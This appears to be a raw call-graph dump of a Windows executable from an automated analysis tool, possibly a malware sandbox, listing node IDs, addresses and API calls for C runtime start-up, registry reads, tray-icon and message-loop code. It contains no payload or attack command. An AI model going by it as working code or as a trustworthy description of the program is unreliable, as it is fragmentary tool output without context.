ef9c2f RtlEnterCriticalSection 104287->104288 104289 ef9c1c 104287->104289 104288->104272 104294 ef9c93 104289->104294 104291 ef9c22 104291->104288 104318 ef30b5 58 API calls 3 library calls 104291->104318 104295 ef9c9f _flsall 104294->104295 104296 ef9ca8 104295->104296 104297 ef9cc0 104295->104297 104319 efa16b 58 API calls 2 library calls 104296->104319 104301 ef9ce1 _flsall 104297->104301 104322 ef881d 58 API calls 2 library calls 104297->104322 104299 ef9cad 104320 efa1c8 58 API calls 6 library calls 104299->104320 104301->104291 104303 ef9cd5 104305 ef9cdc 104303->104305 104306 ef9ceb 104303->104306 104304 ef9cb4 104321 ef309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104304->104321 104323 ef8b28 58 API calls __getptd_noexit 104305->104323 104309 ef9c0b __lock 58 API calls 104306->104309 104311 ef9cf2 104309->104311 104312 ef9cff 104311->104312 104313 ef9d17 104311->104313 104324 ef9e2b InitializeCriticalSectionAndSpinCount 104312->104324 104325 ef2d55 104313->104325 104316 ef9d0b 104331 ef9d33 RtlLeaveCriticalSection _doexit 104316->104331 104319->104299 104320->104304 104322->104303 104323->104301 104324->104316 104326 ef2d5e RtlFreeHeap 104325->104326 104330 ef2d87 _free 104325->104330 104327 ef2d73 104326->104327 104326->104330 104332 ef8b28 58 API calls __getptd_noexit 104327->104332 104329 ef2d79 GetLastError 104329->104330 104330->104316 104331->104301 104332->104329 104333->104278 104334->104279 104335->104283 104339 ef9d75 RtlLeaveCriticalSection 104336->104339 104338 ef2c87 104338->104269 104339->104338 104340 ed1055 104345 ed2649 104340->104345 104343 ef2d40 __cinit 67 API calls 104344 ed1064 104343->104344 104346 ed7667 59 API calls 104345->104346 104347 ed26b7 104346->104347 104352 ed3582 104347->104352 104350 ed2754 104351 ed105a 104350->104351 104355 ed3416 59 API calls 2 library calls 104350->104355 104351->104343 104356 ed35b0 104352->104356 104355->104350 104357 ed35bd 104356->104357 104358 ed35a1 104356->104358 104357->104358 104359 ed35c4 RegOpenKeyExW 104357->104359 104358->104350 104359->104358 104360 ed35de RegQueryValueExW 104359->104360 104361 ed35ff 104360->104361 104362 ed3614 RegCloseKey 104360->104362 104361->104362 104362->104358 104363 ef7c56 104364 ef7c62 _flsall 104363->104364 104400 ef9e08 GetStartupInfoW 104364->104400 104366 ef7c67 104402 ef8b7c GetProcessHeap 104366->104402 104368 ef7cbf 104369 ef7cca 104368->104369 104485 ef7da6 58 API calls 3 library calls 104368->104485 104403 ef9ae6 104369->104403 104372 ef7cd0 104374 ef7cdb __RTC_Initialize 104372->104374 104486 ef7da6 58 API calls 3 library calls 104372->104486 104424 efd5d2 104374->104424 104376 ef7cea 104377 ef7cf6 GetCommandLineW 104376->104377 104487 ef7da6 58 API calls 3 library calls 104376->104487 104443 f04f23 GetEnvironmentStringsW 104377->104443 104380 ef7cf5 104380->104377 104383 ef7d10 104384 ef7d1b 104383->104384 104488 ef30b5 58 API calls 3 library calls 104383->104488 104453 f04d58 104384->104453 104387 ef7d21 104388 ef7d2c 104387->104388 104489 ef30b5 58 API calls 3 library calls 104387->104489 104467 ef30ef 104388->104467 104391 ef7d34 104392 ef7d3f __wwincmdln 104391->104392 104490 ef30b5 58 API calls 3 library calls 104391->104490 104473 ed47d0 104392->104473 104395 ef7d53 104396 ef7d62 104395->104396 104491 ef3358 58 API calls _doexit 104395->104491 104492 ef30e0 58 API calls _doexit 104396->104492 104399 ef7d67 _flsall 104401 ef9e1e 104400->104401 104401->104366 104402->104368 104493 ef3187 36 API calls 2 library calls 104403->104493 104405 ef9aeb 104494 ef9d3c InitializeCriticalSectionAndSpinCount __ioinit 104405->104494 104407 ef9af0 104408 ef9af4 104407->104408 104496 ef9d8a TlsAlloc 104407->104496 104495 ef9b5c 61 API calls 2 library calls 104408->104495 104411 ef9b06 104411->104408 104413 ef9b11 104411->104413 104412 ef9af9 104412->104372 104497 ef87d5 104413->104497 104416 ef9b53 104505 ef9b5c 61 API calls 2 library calls 104416->104505 104419 ef9b32 104419->104416 104421 ef9b38 104419->104421 104420 ef9b58 104420->104372 104504 ef9a33 58 API calls 4 library calls 104421->104504 104423 ef9b40 GetCurrentThreadId 104423->104372 104425 efd5de _flsall 104424->104425 104426 ef9c0b __lock 58 API calls 104425->104426 104427 efd5e5 104426->104427 104428 ef87d5 __calloc_crt 58 API calls 104427->104428 104429 efd5f6 104428->104429 104430 efd601 _flsall @_EH4_CallFilterFunc@8 104429->104430 104431 efd661 GetStartupInfoW 104429->104431 104430->104376 104437 efd676 104431->104437 104440 efd7a5 104431->104440 104432 efd86d 104519 efd87d RtlLeaveCriticalSection _doexit 104432->104519 104434 ef87d5 __calloc_crt 58 API calls 104434->104437 104435 efd7f2 GetStdHandle 104435->104440 104436 efd805 GetFileType 104436->104440 104437->104434 104439 efd6c4 104437->104439 104437->104440 104438 efd6f8 GetFileType 104438->104439 104439->104438 104439->104440 104517 ef9e2b InitializeCriticalSectionAndSpinCount 104439->104517 104440->104432 104440->104435 104440->104436 104518 ef9e2b InitializeCriticalSectionAndSpinCount 104440->104518 104444 f04f34 104443->104444 104445 ef7d06 104443->104445 104520 ef881d 58 API calls 2 library calls 104444->104520 104449 f04b1b GetModuleFileNameW 104445->104449 104447 f04f5a _memmove 104448 f04f70 FreeEnvironmentStringsW 104447->104448 104448->104445 104451 f04b4f _wparse_cmdline 104449->104451 104450 f04b8f _wparse_cmdline 104450->104383 104451->104450 104521 ef881d 58 API calls 2 library calls 104451->104521 104454 f04d71 __NMSG_WRITE 104453->104454 104458 f04d69 104453->104458 104455 ef87d5 __calloc_crt 58 API calls 104454->104455 104463 f04d9a __NMSG_WRITE 104455->104463 104456 f04df1 104457 ef2d55 _free 58 API calls 104456->104457 104457->104458 104458->104387 104459 ef87d5 __calloc_crt 58 API calls 104459->104463 104460 f04e16 104462 ef2d55 _free 58 API calls 104460->104462 104462->104458 104463->104456 104463->104458 104463->104459 104463->104460 104464 f04e2d 104463->104464 104522 f04607 58 API calls ___crtsetenv 104463->104522 104523 ef8dc6 IsProcessorFeaturePresent 104464->104523 104466 f04e39 104466->104387 104470 ef30fb __IsNonwritableInCurrentImage 104467->104470 104469 ef3119 __initterm_e 104471 ef2d40 __cinit 67 API calls 104469->104471 104472 ef3138 __cinit __IsNonwritableInCurrentImage 104469->104472 104546 efa4d1 104470->104546 104471->104472 104472->104391 104474 ed47ea 104473->104474 104484 ed4889 104473->104484 104475 ed4824 74D2C8D0 104474->104475 104549 ef336c 104475->104549 104479 ed4850 104561 ed48fd SystemParametersInfoW SystemParametersInfoW 104479->104561 104481 ed485c 104562 ed3b3a 104481->104562 104483 ed4864 SystemParametersInfoW 104483->104484 104484->104395 104485->104369 104486->104374 104487->104380 104491->104396 104492->104399 104493->104405 104494->104407 104495->104412 104496->104411 104500 ef87dc 104497->104500 104499 ef8817 104499->104416 104503 ef9de6 TlsSetValue 104499->104503 104500->104499 104502 ef87fa 104500->104502 104506 f051f6 104500->104506 104502->104499 104502->104500 104514 efa132 Sleep 104502->104514 104503->104419 104504->104423 104505->104420 104507 f05201 104506->104507 104510 f0521c 104506->104510 104508 f0520d 104507->104508 104507->104510 104515 ef8b28 58 API calls __getptd_noexit 104508->104515 104511 f0522c RtlAllocateHeap 104510->104511 104512 f05212 104510->104512 104516 ef33a1 RtlDecodePointer 104510->104516 104511->104510 104511->104512 104512->104500 104514->104502 104515->104512 104516->104510 104517->104439 104518->104440 104519->104430 104520->104447 104521->104450 104522->104463 104524 ef8dd1 104523->104524 104529 ef8c59 104524->104529 104528 ef8dec 104528->104466 104530 ef8c73 _memset __call_reportfault 104529->104530 104531 ef8c93 IsDebuggerPresent 104530->104531 104537 efa155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104531->104537 104534 ef8d57 __call_reportfault 104538 efc5f6 104534->104538 104535 ef8d7a 104536 efa140 GetCurrentProcess TerminateProcess 104535->104536 104536->104528 104537->104534 104539 efc5fe 104538->104539 104540 efc600 IsProcessorFeaturePresent 104538->104540 104539->104535 104542 f0590a 104540->104542 104545 f058b9 5 API calls 2 library calls 104542->104545 104544 f059ed 104544->104535 104545->104544 104547 efa4d4 RtlEncodePointer 104546->104547 104547->104547 104548 efa4ee 104547->104548 104548->104469 104550 ef9c0b __lock 58 API calls 104549->104550 104551 ef3377 RtlDecodePointer RtlEncodePointer 104550->104551 104614 ef9d75 RtlLeaveCriticalSection 104551->104614 104553 ed4849 104554 ef33d4 104553->104554 104555 ef33de 104554->104555 104556 ef33f8 104554->104556 104555->104556 104615 ef8b28 58 API calls __getptd_noexit 104555->104615 104556->104479 104558 ef33e8 104616 ef8db6 9 API calls ___crtsetenv 104558->104616 104560 ef33f3 104560->104479 104561->104481 104563 ed3b47 __ftell_nolock 104562->104563 104564 ed7667 59 API calls 104563->104564 104565 ed3b51 GetCurrentDirectoryW 104564->104565 104617 ed3766 104565->104617 104567 ed3b7a IsDebuggerPresent 104568 f0d272 MessageBoxA 104567->104568 104569 ed3b88 104567->104569 104570 f0d28c 104568->104570 104569->104570 104571 ed3ba5 104569->104571 104604 ed3c61 104569->104604 104827 ed7213 59 API calls Mailbox 104570->104827 104698 ed7285 104571->104698 104572 ed3c68 SetCurrentDirectoryW 104575 ed3c75 Mailbox 104572->104575 104575->104483 104576 f0d29c 104581 f0d2b2 SetCurrentDirectoryW 104576->104581 104578 ed3bc3 GetFullPathNameW 104579 ed7bcc 59 API calls 104578->104579 104580 ed3bfe 104579->104580 104714 ee092d 104580->104714 104581->104575 104584 ed3c1c 104585 ed3c26 104584->104585 104828 f2874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104584->104828 104730 ed3a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104585->104730 104588 f0d2cf 104588->104585 104591 f0d2e0 104588->104591 104594 ed4706 61 API calls 104591->104594 104592 ed3c30 104593 ed3c43 104592->104593 104738 ed434a 104592->104738 104749 ee09d0 104593->104749 104597 f0d2e8 104594->104597 104599 ed7de1 59 API calls 104597->104599 104598 ed3c4e 104598->104604 104826 ed443a Shell_NotifyIconW _memset 104598->104826 104600 f0d2f5 104599->104600 104601 f0d324 104600->104601 104602 f0d2ff 104600->104602 104606 ed7cab 59 API calls 104601->104606 104605 ed7cab 59 API calls 104602->104605 104604->104572 104607 f0d30a 104605->104607 104608 f0d320 GetForegroundWindow ShellExecuteW 104606->104608 104829 ed7b2e 104607->104829 104612 f0d354 Mailbox 104608->104612 104612->104604 104613 ed7cab 59 API calls 104613->104608 104614->104553 104615->104558 104616->104560 104618 ed7667 59 API calls 104617->104618 104619 ed377c 104618->104619 104838 ed3d31 104619->104838 104621 ed379a 104622 ed4706 61 API calls 104621->104622 104623 ed37ae 104622->104623 104624 ed7de1 59 API calls 104623->104624 104625 ed37bb 104624->104625 104852 ed4ddd 104625->104852 104628 ed37dc Mailbox 104876 ed8047 104628->104876 104629 f0d173 104923 f3955b 104629->104923 104632 f0d192 104635 ef2d55 _free 58 API calls 104632->104635 104637 f0d19f 104635->104637 104639 ed4e4a 84 API calls 104637->104639 104641 f0d1a8 104639->104641 104645 ed3ed0 59 API calls 104641->104645 104642 ed7de1 59 API calls 104643 ed3808 104642->104643 104883 ed84c0 104643->104883 104647 f0d1c3 104645->104647 104646 ed381a Mailbox 104648 ed7de1 59 API calls 104646->104648 104649 ed3ed0 59 API calls 104647->104649 104650 ed3840 104648->104650 104651 f0d1df 104649->104651 104652 ed84c0 69 API calls 104650->104652 104653 ed4706 61 API calls 104651->104653 104655 ed384f Mailbox 104652->104655 104654 f0d204 104653->104654 104656 ed3ed0 59 API calls 104654->104656 104658 ed7667 59 API calls 104655->104658 104657 f0d210 104656->104657 104659 ed8047 59 API calls 104657->104659 104660 ed386d 104658->104660 104661 f0d21e 104659->104661 104887 ed3ed0 104660->104887 104663 ed3ed0 59 API calls 104661->104663 104666 f0d22d 104663->104666 104671 ed8047 59 API calls 104666->104671 104667 ed3887 104667->104641 104668 ed3891 104667->104668 104669 ef2efd _W_store_winword 60 API calls 104668->104669 104670 ed389c 104669->104670 104670->104647 104672 ed38a6 104670->104672 104673 f0d24f 104671->104673 104674 ef2efd _W_store_winword 60 API calls 104672->104674 104675 ed3ed0 59 API calls 104673->104675 104676 ed38b1 104674->104676 104677 f0d25c 104675->104677 104676->104651 104678 ed38bb 104676->104678 104677->104677 104679 ef2efd _W_store_winword 60 API calls 104678->104679 104680 ed38c6 104679->104680 104680->104666 104681 ed3907 104680->104681 104683 ed3ed0 59 API calls 104680->104683 104681->104666 104682 ed3914 104681->104682 104903 ed92ce 104682->104903 104685 ed38ea 104683->104685 104687 ed8047 59 API calls 104685->104687 104688 ed38f8 104687->104688 104690 ed3ed0 59 API calls 104688->104690 104690->104681 104693 ed928a 59 API calls 104695 ed394f 104693->104695 104694 ed8ee0 60 API calls 104694->104695 104695->104693 104695->104694 104696 ed3ed0 59 API calls 104695->104696 104697 ed3995 Mailbox 104695->104697 104696->104695 104697->104567 104699 ed7292 __ftell_nolock 104698->104699 104700 f0ea22 _memset 104699->104700 104701 ed72ab 104699->104701 104703 f0ea3e 7574D0D0 104700->104703 104702 ed4750 60 API calls 104701->104702 104704 ed72b4 104702->104704 104705 f0ea8d 104703->104705 105779 ef0791 104704->105779 104707 ed7bcc 59 API calls 104705->104707 104709 f0eaa2 104707->104709 104709->104709 104711 ed72c9 105797 ed686a 104711->105797 104715 ee093a __ftell_nolock 104714->104715 106048 ed6d80 104715->106048 104717 ee093f 104728 ed3c14 104717->104728 106059 ee119e 90 API calls 104717->106059 104719 ee094c 104719->104728 106060 ee3ee7 92 API calls Mailbox 104719->106060 104721 ee0955 104722 ee0959 GetFullPathNameW 104721->104722 104721->104728 104723 ed7bcc 59 API calls 104722->104723 104724 ee0985 104723->104724 104725 ed7bcc 59 API calls 104724->104725 104726 ee0992 104725->104726 104727 ed7bcc 59 API calls 104726->104727 104729 f14cab _wcscat 104726->104729 104727->104728 104728->104576 104728->104584 104731 f0d261 104730->104731 104732 ed3ab0 LoadImageW RegisterClassExW 104730->104732 106102 ed47a0 LoadImageW EnumResourceNamesW 104731->106102 106098 ed3041 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 104732->106098 104736 f0d26a 104737 ed39d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104737->104592 104739 ed4375 _memset 104738->104739 106103 ed4182 104739->106103 104742 ed43fa 104744 ed4414 Shell_NotifyIconW 104742->104744 104745 ed4430 Shell_NotifyIconW 104742->104745 104746 ed4422 104744->104746 104745->104746 106107 ed407c 104746->106107 104750 f14cc3 104749->104750 104762 ee09f5 104749->104762 106265 f39e4a 90 API calls 4 library calls 104750->106265 104752 ee0cfa 104752->104598 104755 ee0ee4 104755->104752 104756 ee0ef1 104755->104756 106263 ee1093 332 API calls Mailbox 104756->106263 104757 ee0a4b PeekMessageW 104817 ee0a05 Mailbox 104757->104817 104761 ee0ce4 104761->104752 106262 ee1070 10 API calls Mailbox 104761->106262 104762->104817 106266 ed9e5d 60 API calls 104762->106266 106267 f26349 332 API calls 104762->106267 104763 f14e81 Sleep 104763->104817 104768 f14d50 TranslateAcceleratorW 104770 ee0e43 PeekMessageW 104768->104770 104768->104817 104769 ee0ea5 TranslateMessage DispatchMessageW 104769->104770 104770->104817 104771 f1581f WaitForSingleObject 104774 f1583c GetExitCodeProcess CloseHandle 104771->104774 104771->104817 104773 ee0d13 timeGetTime 104773->104817 104810 ee0f95 104774->104810 104775 ee0e5f Sleep 104811 ee0e70 Mailbox 104775->104811 104776 ed8047 59 API calls 104776->104817 104777 ed7667 59 API calls 104777->104811 104778 f15af8 Sleep 104778->104811 104780 ef0db6 59 API calls Mailbox 104780->104817 104782 ef049f timeGetTime 104782->104811 104783 ee0f4e timeGetTime 106264 ed9e5d 60 API calls 104783->106264 104786 f15b8f GetExitCodeProcess 104789 f15ba5 WaitForSingleObject 104786->104789 104790 f15bbb CloseHandle 104786->104790 104788 edb7dd 110 API calls 104788->104811 104789->104790 104789->104817 104790->104811 104792 edb73c 305 API calls 104792->104817 104794 f55f25 111 API calls 104794->104811 104795 ed9e5d 60 API calls 104795->104817 104796 f15874 104796->104810 104797 f15078 Sleep 104797->104817 104798 f15c17 Sleep 104798->104817 104800 ed7de1 59 API calls 104800->104811 104804 ed9ea0 305 API calls 104804->104817 104810->104598 104811->104777 104811->104782 104811->104786 104811->104788 104811->104794 104811->104796 104811->104797 104811->104798 104811->104800 104811->104810 104811->104817 106292 f32408 60 API calls 104811->106292 106293 ed9e5d 60 API calls 104811->106293 106294 ed89b3 69 API calls Mailbox 104811->106294 106295 edb73c 332 API calls 104811->106295 106296 f264da 60 API calls 104811->106296 106297 f35244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104811->106297 106298 f33c55 66 API calls Mailbox 104811->106298 104812 ed7de1 59 API calls 104812->104817 104813 f39e4a 90 API calls 104813->104817 104815 ed84c0 69 API calls 104815->104817 104816 ed9c90 59 API calls Mailbox 104816->104817 104817->104757 104817->104761 104817->104763 104817->104768 104817->104769 104817->104770 104817->104771 104817->104773 104817->104775 104817->104776 104817->104778 104817->104780 104817->104783 104817->104792 104817->104795 104817->104804 104817->104810 104817->104811 104817->104812 104817->104813 104817->104815 104817->104816 104819 ed89b3 69 API calls 104817->104819 104820 f155d5 VariantClear 104817->104820 104821 f2617e 59 API calls Mailbox 104817->104821 104822 f1566b VariantClear 104817->104822 104823 f15419 VariantClear 104817->104823 104824 f26e8f 59 API calls 104817->104824 104825 ed8cd4 59 API calls Mailbox 104817->104825 106130 ede6a0 104817->106130 106161 edf460 104817->106161 106180 edfce0 104817->106180 106260 ede420 332 API calls 104817->106260 106261 ed31ce IsDialogMessageW GetClassLongW 104817->106261 106268 f56018 59 API calls 104817->106268 106269 f39a15 59 API calls Mailbox 104817->106269 106270 f2d4f2 59 API calls 104817->106270 106271 ed9837 104817->106271 106289 f260ef 59 API calls 2 library calls 104817->106289 106290 ed8401 59 API calls 104817->106290 106291 ed82df 59 API calls Mailbox 104817->106291 104819->104817 104820->104817 104821->104817 104822->104817 104823->104817 104824->104817 104825->104817 104826->104604 104827->104576 104828->104588 104830 f0ec6b 104829->104830 104831 ed7b40 104829->104831 106609 f27bdb 59 API calls _memmove 104830->106609 106603 ed7a51 104831->106603 104834 ed7b4c 104834->104613 104835 f0ec75 104836 ed8047 59 API calls 104835->104836 104837 f0ec7d Mailbox 104836->104837 104839 ed3d3e __ftell_nolock 104838->104839 104840 ed7bcc 59 API calls 104839->104840 104845 ed3ea4 Mailbox 104839->104845 104842 ed3d70 104840->104842 104850 ed3da6 Mailbox 104842->104850 104964 ed79f2 104842->104964 104843 ed79f2 59 API calls 104843->104850 104844 ed3e77 104844->104845 104846 ed7de1 59 API calls 104844->104846 104845->104621 104848 ed3e98 104846->104848 104847 ed7de1 59 API calls 104847->104850 104849 ed3f74 59 API calls 104848->104849 104849->104845 104850->104843 104850->104844 104850->104845 104850->104847 104851 ed3f74 59 API calls 104850->104851 104851->104850 104967 ed4bb5 104852->104967 104857 ed4e08 LoadLibraryExW 104977 ed4b6a 104857->104977 104858 f0d8e6 104859 ed4e4a 84 API calls 104858->104859 104861 f0d8ed 104859->104861 104863 ed4b6a 3 API calls 104861->104863 104865 f0d8f5 104863->104865 105003 ed4f0b 104865->105003 104866 ed4e2f 104866->104865 104867 ed4e3b 104866->104867 104868 ed4e4a 84 API calls 104867->104868 104870 ed37d4 104868->104870 104870->104628 104870->104629 104873 f0d91c 105011 ed4ec7 104873->105011 104875 f0d929 104877 ed37ef 104876->104877 104878 ed8052 104876->104878 104880 ed928a 104877->104880 105437 ed7f77 59 API calls 2 library calls 104878->105437 104881 ef0db6 Mailbox 59 API calls 104880->104881 104882 ed37fb 104881->104882 104882->104642 104884 ed84cb 104883->104884 104885 ed84f2 104884->104885 105438 ed89b3 69 API calls Mailbox 104884->105438 104885->104646 104888 ed3eda 104887->104888 104889 ed3ef3 104887->104889 104891 ed8047 59 API calls 104888->104891 104890 ed7bcc 59 API calls 104889->104890 104892 ed3879 104890->104892 104891->104892 104893 ef2efd 104892->104893 104894 ef2f7e 104893->104894 104895 ef2f09 104893->104895 105441 ef2f90 60 API calls 3 library calls 104894->105441 104902 ef2f2e 104895->104902 105439 ef8b28 58 API calls __getptd_noexit 104895->105439 104898 ef2f8b 104898->104667 104899 ef2f15 105440 ef8db6 9 API calls ___crtsetenv 104899->105440 104901 ef2f20 104901->104667 104902->104667 104904 ed92d6 104903->104904 104905 ef0db6 Mailbox 59 API calls 104904->104905 104906 ed92e4 104905->104906 104907 ed3924 104906->104907 105442 ed91fc 59 API calls Mailbox 104906->105442 104909 ed9050 104907->104909 105443 ed9160 104909->105443 104911 ed905f 104912 ef0db6 Mailbox 59 API calls 104911->104912 104913 ed3932 104911->104913 104912->104913 104914 ed8ee0 104913->104914 104915 f0f17c 104914->104915 104917 ed8ef7 104914->104917 104915->104917 105453 ed8bdb 59 API calls Mailbox 104915->105453 104918 ed8ff8 104917->104918 104919 ed9040 104917->104919 104922 ed8fff 104917->104922 104921 ef0db6 Mailbox 59 API calls 104918->104921 105452 ed9d3c 60 API calls Mailbox 104919->105452 104921->104922 104922->104695 104924 ed4ee5 85 API calls 104923->104924 104925 f395ca 104924->104925 105454 f39734 104925->105454 104928 ed4f0b 74 API calls 104929 f395f7 104928->104929 104930 ed4f0b 74 API calls 104929->104930 104931 f39607 104930->104931 104932 ed4f0b 74 API calls 104931->104932 104933 f39622 104932->104933 104934 ed4f0b 74 API calls 104933->104934 104935 f3963d 104934->104935 104936 ed4ee5 85 API calls 104935->104936 104937 f39654 104936->104937 104938 ef571c _W_store_winword 58 API calls 104937->104938 104939 f3965b 104938->104939 104940 ef571c _W_store_winword 58 API calls 104939->104940 104941 f39665 104940->104941 104942 ed4f0b 74 API calls 104941->104942 104943 f39679 104942->104943 104944 f39109 GetSystemTimeAsFileTime 104943->104944 104945 f3968c 104944->104945 104946 f396a1 104945->104946 104947 f396b6 104945->104947 104948 ef2d55 _free 58 API calls 104946->104948 104949 f3971b 104947->104949 104950 f396bc 104947->104950 104952 f396a7 104948->104952 104951 ef2d55 _free 58 API calls 104949->104951 105460 f38b06 104950->105460 104954 f0d186 104951->104954 104955 ef2d55 _free 58 API calls 104952->104955 104954->104632 104958 ed4e4a 104954->104958 104955->104954 104957 ef2d55 _free 58 API calls 104957->104954 104959 ed4e5b 104958->104959 104960 ed4e54 104958->104960 104962 ed4e7b FreeLibrary 104959->104962 104963 ed4e6a 104959->104963 104961 ef53a6 __fcloseall 83 API calls 104960->104961 104961->104959 104962->104963 104963->104632 104965 ed7e4f 59 API calls 104964->104965 104966 ed79fd 104965->104966 104966->104842 105016 ed4c03 104967->105016 104970 ed4bdc 104972 ed4bec FreeLibrary 104970->104972 104973 ed4bf5 104970->104973 104971 ed4c03 2 API calls 104971->104970 104972->104973 104974 ef525b 104973->104974 105020 ef5270 104974->105020 104976 ed4dfc 104976->104857 104976->104858 105177 ed4c36 104977->105177 104980 ed4c36 2 API calls 104983 ed4b8f 104980->104983 104981 ed4baa 104984 ed4c70 104981->104984 104982 ed4ba1 FreeLibrary 104982->104981 104983->104981 104983->104982 104985 ef0db6 Mailbox 59 API calls 104984->104985 104986 ed4c85 104985->104986 104987 ed522e 59 API calls 104986->104987 104988 ed4c91 _memmove 104987->104988 104990 ed4d89 104988->104990 104991 ed4dc1 104988->104991 104994 ed4ccc 104988->104994 104989 ed4ec7 69 API calls 104999 ed4cd5 104989->104999 105181 ed4e89 CreateStreamOnHGlobal 104990->105181 105192 f3991b 95 API calls 104991->105192 104994->104989 104995 ed4f0b 74 API calls 104995->104999 104997 ed4d69 104997->104866 104998 f0d8a7 105000 ed4ee5 85 API calls 104998->105000 104999->104995 104999->104997 104999->104998 105187 ed4ee5 104999->105187 105001 f0d8bb 105000->105001 105002 ed4f0b 74 API calls 105001->105002 105002->104997 105004 ed4f1d 105003->105004 105007 f0d9cd 105003->105007 105216 ef55e2 105004->105216 105008 f39109 105414 f38f5f 105008->105414 105010 f3911f 105010->104873 105012 f0d990 105011->105012 105013 ed4ed6 105011->105013 105419 ef5c60 105013->105419 105015 ed4ede 105015->104875 105017 ed4bd0 105016->105017 105018 ed4c0c LoadLibraryA 105016->105018 105017->104970 105017->104971 105018->105017 105019 ed4c1d GetProcAddress 105018->105019 105019->105017 105022 ef527c _flsall 105020->105022 105021 ef528f 105069 ef8b28 58 API calls __getptd_noexit 105021->105069 105022->105021 105024 ef52c0 105022->105024 105039 f004e8 105024->105039 105025 ef5294 105070 ef8db6 9 API calls ___crtsetenv 105025->105070 105028 ef52c5 105029 ef52ce 105028->105029 105030 ef52db 105028->105030 105071 ef8b28 58 API calls __getptd_noexit 105029->105071 105032 ef5305 105030->105032 105033 ef52e5 105030->105033 105054 f00607 105032->105054 105072 ef8b28 58 API calls __getptd_noexit 105033->105072 105035 ef529f _flsall @_EH4_CallFilterFunc@8 105035->104976 105040 f004f4 _flsall 105039->105040 105041 ef9c0b __lock 58 API calls 105040->105041 105042 f00502 105041->105042 105043 f0057d 105042->105043 105049 ef9c93 __mtinitlocknum 58 API calls 105042->105049 105052 f00576 105042->105052 105077 ef6c50 59 API calls __lock 105042->105077 105078 ef6cba RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 105042->105078 105079 ef881d 58 API calls 2 library calls 105043->105079 105046 f00584 105046->105052 105080 ef9e2b InitializeCriticalSectionAndSpinCount 105046->105080 105047 f005f3 _flsall 105047->105028 105049->105042 105051 f005aa RtlEnterCriticalSection 105051->105052 105074 f005fe 105052->105074 105062 f00627 __wopenfile 105054->105062 105055 f00641 105085 ef8b28 58 API calls __getptd_noexit 105055->105085 105057 f00646 105086 ef8db6 9 API calls ___crtsetenv 105057->105086 105059 f0085f 105082 f085a1 105059->105082 105060 ef5310 105073 ef5332 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 105060->105073 105062->105055 105068 f007fc 105062->105068 105087 ef37cb 60 API calls 2 library calls 105062->105087 105064 f007f5 105064->105068 105088 ef37cb 60 API calls 2 library calls 105064->105088 105066 f00814 105066->105068 105089 ef37cb 60 API calls 2 library calls 105066->105089 105068->105055 105068->105059 105069->105025 105070->105035 105071->105035 105072->105035 105073->105035 105081 ef9d75 RtlLeaveCriticalSection 105074->105081 105076 f00605 105076->105047 105077->105042 105078->105042 105079->105046 105080->105051 105081->105076 105090 f07d85 105082->105090 105084 f085ba 105084->105060 105085->105057 105086->105060 105087->105064 105088->105066 105089->105068 105091 f07d91 _flsall 105090->105091 105092 f07da7 105091->105092 105095 f07ddd 105091->105095 105174 ef8b28 58 API calls __getptd_noexit 105092->105174 105094 f07dac 105175 ef8db6 9 API calls ___crtsetenv 105094->105175 105101 f07e4e 105095->105101 105098 f07df9 105176 f07e22 RtlLeaveCriticalSection __unlock_fhandle 105098->105176 105100 f07db6 _flsall 105100->105084 105102 f07e6e 105101->105102 105103 ef44ea __wsopen_nolock 58 API calls 105102->105103 105106 f07e8a 105103->105106 105104 ef8dc6 __invoke_watson 8 API calls 105105 f085a0 105104->105105 105108 f07d85 __wsopen_helper 103 API calls 105105->105108 105107 f07ec4 105106->105107 105115 f07ee7 105106->105115 105173 f07fc1 105106->105173 105109 ef8af4 __close 58 API calls 105107->105109 105110 f085ba 105108->105110 105111 f07ec9 105109->105111 105110->105098 105112 ef8b28 ___crtsetenv 58 API calls 105111->105112 105113 f07ed6 105112->105113 105116 ef8db6 ___crtsetenv 9 API calls 105113->105116 105114 f07fa5 105117 ef8af4 __close 58 API calls 105114->105117 105115->105114 105123 f07f83 105115->105123 105118 f07ee0 105116->105118 105119 f07faa 105117->105119 105118->105098 105120 ef8b28 ___crtsetenv 58 API calls 105119->105120 105121 f07fb7 105120->105121 105122 ef8db6 ___crtsetenv 9 API calls 105121->105122 105122->105173 105124 efd294 __alloc_osfhnd 61 API calls 105123->105124 105125 f08051 105124->105125 105126 f0805b 105125->105126 105127 f0807e 105125->105127 105128 ef8af4 __close 58 API calls 105126->105128 105129 f07cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105127->105129 105130 f08060 105128->105130 105140 f080a0 105129->105140 105131 ef8b28 ___crtsetenv 58 API calls 105130->105131 105133 f0806a 105131->105133 105132 f0811e GetFileType 105134 f08129 GetLastError 105132->105134 105135 f0816b 105132->105135 105138 ef8b28 ___crtsetenv 58 API calls 105133->105138 105139 ef8b07 __dosmaperr 58 API calls 105134->105139 105145 efd52a __set_osfhnd 59 API calls 105135->105145 105136 f080ec GetLastError 105137 ef8b07 __dosmaperr 58 API calls 105136->105137 105141 f08111 105137->105141 105138->105118 105142 f08150 CloseHandle 105139->105142 105140->105132 105140->105136 105143 f07cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105140->105143 105147 ef8b28 ___crtsetenv 58 API calls 105141->105147 105142->105141 105146 f0815e 105142->105146 105144 f080e1 105143->105144 105144->105132 105144->105136 105150 f08189 105145->105150 105148 ef8b28 ___crtsetenv 58 API calls 105146->105148 105147->105173 105149 f08163 105148->105149 105149->105141 105151 f08344 105150->105151 105152 f018c1 __lseeki64_nolock 60 API calls 105150->105152 105160 f0820a 105150->105160 105153 f08517 CloseHandle 105151->105153 105151->105173 105154 f081f3 105152->105154 105155 f07cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105153->105155 105158 ef8af4 __close 58 API calls 105154->105158 105154->105160 105157 f0853e 105155->105157 105156 f00e5b 70 API calls __read_nolock 105156->105160 105159 f08546 GetLastError 105157->105159 105166 f08572 105157->105166 105158->105160 105161 ef8b07 __dosmaperr 58 API calls 105159->105161 105160->105151 105160->105156 105163 f00add __close_nolock 61 